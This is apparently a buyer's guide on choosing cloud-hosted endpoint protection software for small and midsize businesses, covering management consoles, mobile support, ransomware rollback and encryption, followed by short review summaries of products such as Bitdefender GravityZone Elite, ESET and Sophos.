Nothing in IT changes more quickly and requires more sophistication than effective network and data security. That’s difficult for enterprises who can afford specialist staffers, but it’s difficult for budget-conscious small to midsize businesses (SMBs) even though those organizations face the same security challenges as their larger counterparts. Although precise estimates vary, somewhere around half of all security incidents affect organizations with less than 1,000 employees. Sure, data breaches at the IRS and Target are what make the news, but it’s important to remember that the threats to SMBs are very real and just as common, even if staggering dollar figures aren’t always involved.
In many cases, an SMB’s IT administrator faces the same threats that teams of his or her enterprise counterparts face, except that he or she is likely to face them alone while trying to deal with 20 completely unrelated issues at the same time. This makes designing a security solution for an SMB audience a difficult contrast between ease-of-use and state-of-the-art technology shielding.
Small fish still make big target, though. In a Visa and National Cyber Security Alliance (NCSA) survey of 1,000 small business owners, 85 percent of respondents believed that enterprises are more targeted than they are, yet another survey by the same group found that 20 percent of small businesses suffered a data breach in 2013.
So, as long as your data holds value, criminals don’t care how big your company is. Data that holds value includes employee and customer personal and banking information, sensitive corporate intellectual property (IP), sales and product information, and company financial information such as payroll data. There’s also another angle: Criminals can use the systems of a small business to exploit trust relationships with larger businesses. If this is the case, then the small business is held responsible for the damages done.
In fact, some hackers actively target small businesses precisely because they’re small. Since they don’t have the resources necessary to adequately shield against intrusion, they’re the low-hanging fruit, and many carry information just as valuable as that of larger organizations, especially in aggregate. It takes less effort to steal financial data and act on it. Furthermore, because no defenses are in place, the attacks are extremely difficult, if not impossible, to trace without enough logged data to use in a typical forensics process.
Small But With High Stakes
Obviously, the stakes are high in SMB security. Therefore, selecting hosted endpoint protection and security software is a critical decision for IT admins of SMBs. In many ways, you’re choosing a partner that is going to help you secure servers, desktops, laptops, and mobile devices. This is likely to be a long-term partnership because you don’t want to evaluate software solutions, roll one out, remove it, re-evaluate, and re-deploy. So, look for someone who has a track record of combating threats by evolving, refining, and adding new protection tech as applicable.
This partnership is solidified when you choose a Software-as-a-Service (SaaS) package instead of an on-premises package because, instead of buying software that you run yourself, you’ll have daily interactions with software that’s administered and updated by your vendor. SaaS, or cloud-based, hosted endpoint protection and security software has the advantage of reducing the complexity formerly required by their on-premises predecessors that typically run on dedicated servers. SaaS hosted endpoint protection and security software saves you a great deal of time and effort that would otherwise have gone into hardening and patching the underlying server operating system (OS) and patching the management console and its underlying infrastructure. This is not to say that there isn’t significant value in keeping your environment patched. Endpoint protection is typically the last line of defense. It’s better to limit exposure to threats in the first place and one of the best ways, bar none, is to keep up to date on your patch management chores.
Cloud-based services can also be managed outside the office, meaning that admins can manage their endpoint protection on the road or from branch offices by using multiple kinds of internet-connected devices, without loss of function or security. That’s possible to do when the management server is run on-premises but usually with significantly increased difficulty. In many cases, a hosted management console can be easily accessed and used from a mobile device. As an SMB security admin, imagine getting an email alert on your phone that the business owner has encountered malware, and then being able to log in to the management console from your phone’s browser and initiate remediation activities.
Another important advantage is that SaaS software solutions provide protections and updates to devices that are off the corporate network. When your co-workers take their laptops on the road with them, they continue to be protected and you retain the ability to monitor and manage their devices. Previously, once a laptop left the office, a security admin might have had to wait until it returned (or was connected via a virtual private network or VPN) to assess its security status, push updates, adjust policy, or remediate threats. In some cases, this actually extends beyond the endpoint protection software and includes things such as being able to patch the OS and related software remotely. As mentioned earlier, this can have just as big of an impact, if not a bigger one, than simply ensuring that the threat database is current.
Many SMBs’ employees rely heavily on mobile devices to do their jobs. This means that mobile platforms represent as rich a target to hackers and malware as office-based systems. Many businesses overlook mobile device security, leaving this data-rich target unprotected or entirely in the hands of employees who may or may not deploy consumer-grade protections.
Security vendors are responding to these threats and have added protections for Android and iOS tablets and smartphones. Make sure to ask endpoint protection software solution providers if mobile is included (or at least available) and can be managed through the same hosted user interface (UI). You’ll find richer security support for Android than for iOS. Much to the chagrin of customers, Apple selfishly continues to push its marketing agenda that iOS devices are safe from malware and refuses to work with security vendors. Vendors offer to manage devices (e.g., locate and remote wipe) and security policy (e.g., password strength, application control, and Wi-Fi settings) for Android and iOS while offering full security software (e.g., anti-malware app scanning, firewall, and intrusion prevention) only for Android. That doesn’t mean that iOS can’t support useful security software because it can, just with a few more hoops than Android. However, there’s VPN and Safe Browsing apps already included in most implementations of iOS so there may be less need for third-party solutions.
Evaluating the Software
Picking the right hosted endpoint protection and security software solution is an important decision for an SMB. Choosing the wrong product could result in creating a false sense of security amongst users and management, and creating a management nightmare for admins. Products that are needlessly complex are fine for enterprise security admins who live and breathe inside a management console. But you don’t want to waste an SMB security admin’s time and effort—two things that are not in overabundance in any SMB.
For this reason, and because there are significant differences between them, management consoles should be a critical decision-making factor when selecting a hosted endpoint protection and security software solution for your SMB. The best management consoles are uncluttered, intuitive, and have context-sensitive Help waiting in the wings. Dashboards should provide a thorough assessment of company-wide security status and, when something is wrong, provide a quick and easy way to dive deeper, assess the issue, and resolve it. Reports should be helpful and informative whether they are active or passive or both. Policies should be preconfigured using best practices, with the ability to quickly and easily make changes should the admin desire.
For a busy SMB security admin, alerts and notifications can be critical time-savers. Some may choose to stay logged in to a hosted endpoint protection and security software solution, occasionally glancing at dashboards and interactive reports. Others may deploy their agents and then move on to other matters, depending upon notifications and scheduled reports to keep them up to date on the security of users and devices. If this is the case, then pay particular attention to the number of possible notifications (e.g., malware detected, web content policy violated, and potential malicious URLs visited) and the capabilities of the product to manage (e.g., set thresholds and escalations) the alerts.
For traveling employees, it’s also good to look for extras. Some software will include a VPN that will allow secure browsing from coffee shops or when traveling out of the country. This is great for protecting against man-in-the-middle attacks where an attacker will intercept information as it’s being transmitted across the web. Other handy tools, such as password management software and data shredders, are also not uncommon.
New Demands of Data Safety
Ransomware has been a major cause of concern over the past year and that’s likely to continue in the foreseeable future. Detecting it is a top priority, but the race between hackers and security professionals will always be a close one. When hackers lead the race, it’s important to know how to get that data back. Part of what today’s endpoint protection solutions should offer is a way to roll back changes that malicious software, such as ransomware, perform on your system. While everyone hopes that their favorite product will win, making sure your data is preserved takes precedence.
Digital theft also doesn’t have to take place over the internet. A good old-fashioned hammer still works on a car window. If a thief runs off with your laptop, then having its data encrypted is the key to not having the incident come back to haunt you later. Typically, once a physical machine is compromised, there is little that can be done to stop an intruder. But encryption is one of the few methods that’s not only been proven to work but is also cheap and easy to implement. Some endpoint protection products offer encryption management right on their dashboards. For the forgetful road warrior, this can be a life-saver in the event of a scenario such as the one described earlier. Admins should look for management capabilities in this regard as well; for example, that encryption can be enforced as a policy as opposed to being implemented on a device-by-device basis.
In the wake of the recent Equifax breach, it’s more important than ever that endpoint protection software include additional barriers beyond simple antivirus, anti-malware, and anti-phishing software. Even firewalls only partially do the job. A platform that combines all of these capabilities as a cohesive and well-managed whole is what you should be looking for. Intrusion Detection Systems (IDS) are also sorely needed at the small business level but it has been challenging to afford or understand IDS outside of larger enterprise. This is partially due to a dearth of SMB-oriented software and partially due to a skills gap in SMB versus enterprise IT security professionals. SaaS solutions, such as the ones reviewed here, can go a long way toward leveling the playing field.
In addition, there are certain vulnerabilities which are under-serviced. For example, PowerShell, Microsoft’s vision for how the command line should work in the present and future, has been used in a number of new ransomware variants. This is predominantly for convenience and the fact that PowerShell commands tend to be passed off as automatically legitimate. While many enterprises lock down these types of apps for users, small businesses tend to leave them wide open because they’re either required by power users to do so or they’re unaware of the vulnerabilities.
This issue is not just limited to PowerShell, however. Threats that stem from the still-popular Visual Basic for Applications (VBA) also often slip through security nets mainly because they’re so widely used in small business circles as cheap customization and workflow solutions. What makes these types of threats extra dangerous is that they pose as simple Microsoft Word or Microsoft Excel documents. Because macros using VBA are so common, they can easily be passed off as legitimate, letting an attacker compromise and potentially gain control over a victim’s machine.
New Tech for an Old Problem
The challenge, then, is to select a product that can fend off known threats as well as detect odd behavior that hasn’t been seen before. To help, quite a few endpoint protection products have introduced a form of machine learning (ML) to their anti-malware engines. A sizeable portion of them are also able to detect the style of threats that would be seen during a direct cyberattack, which can more quickly point to a source and a solution.
As a bonus, this same tech can sometimes pick up script-based attacks that have, in the past, gone mostly undetected. This will hopefully put a dent in the successful deployments of ransomware and other data-gathering attacks. As malware and ransomware writers are veering more toward this style of engagement, it’s become a major factor in what will truly add security to a small business. Unfortunately, malware scanners aren’t always sensitive enough to pick up these threats by using just their default settings and increasing the aggressiveness sometimes has a performance impact on users. Finding the right balance can often be a challenge and may result in some dissatisfied users in the short term. But you need to weigh that carefully against the cost of compromised systems and data.
At the end of the day, it becomes a question of, “What’s good enough?” The answer will vary from customer to customer depending on specific needs, custom processes, and risk factors. However, one thing is clear: The internet is an ocean of dangerous waters and those waters are only getting deeper. Having an adequate defense isn’t just important, it’s critical.
Bitdefender GravityZone Elite Review
Bottom Line: Bitdefender GravityZone Elite succeeded where the others did not, by stopping a direct attack in a simulated real-world environment. The reporting capabilities and configurability are top-no…
ESET Endpoint Protection Standard Review
Bottom Line: ESET Endpoint Protection Standard is powerful, easy to use, and comes at a good price. While it lags a bit in detecting phishing websites, it excels at detecting exploits locally and from th…
Symantec Endpoint Protection Cloud Review
Bottom Line: Symantec Endpoint Protection Cloud is an excellent security product but comes up short in a few annoying ways. It’s missing antiphishing capabilities and lacks a well-rounded reporting featu…
Kaspersky Endpoint Security Cloud Review
Bottom Line: Kaspersky Endpoint Security Cloud excels at protecting systems, but doesn’t do so well at capitalizing on their cloud management console. While serviceable, this endpoint protection system …
Panda Security Endpoint Protection Review
Bottom Line: As a malware detection and prevention platform, Panda Security Endpoint Protection performs well. However, against active attackers, it lacks some of the basic defenses that are in place in …
GFI LanGuard Review
Bottom Line: GFI LanGuard is a powerful and intuitive network security scanner, vulnerability assessment and patch management tool with a great workflow-driven interface. However, outstanding reporting i…
Bottom Line: Exabeam is an enterprise security software package that’s designed to ferret out security risks and attacks by watching user behavior.
Sophos Cloud Endpoint Protection Review
Bottom Line: SaaS endpoint protection software solution Sophos Cloud Endpoint Protection combines an outstanding management console with good protection scores in our lab tests. Server lockdown, user-bas…
AVG CloudCare Review
Bottom Line: AVG CloudCare is a value-priced, easy-to-deploy and administer, cloud-based endpoint protection solution. It offers good protection, but lacks some required business features for larger orga…
Kaspersky Small Office Security Review
Bottom Line: Kaspersky Small Office Security is an extremely basic web management console tacked onto Kaspersky’s consumer product. It lacks many of the features businesses require and will only appeal t…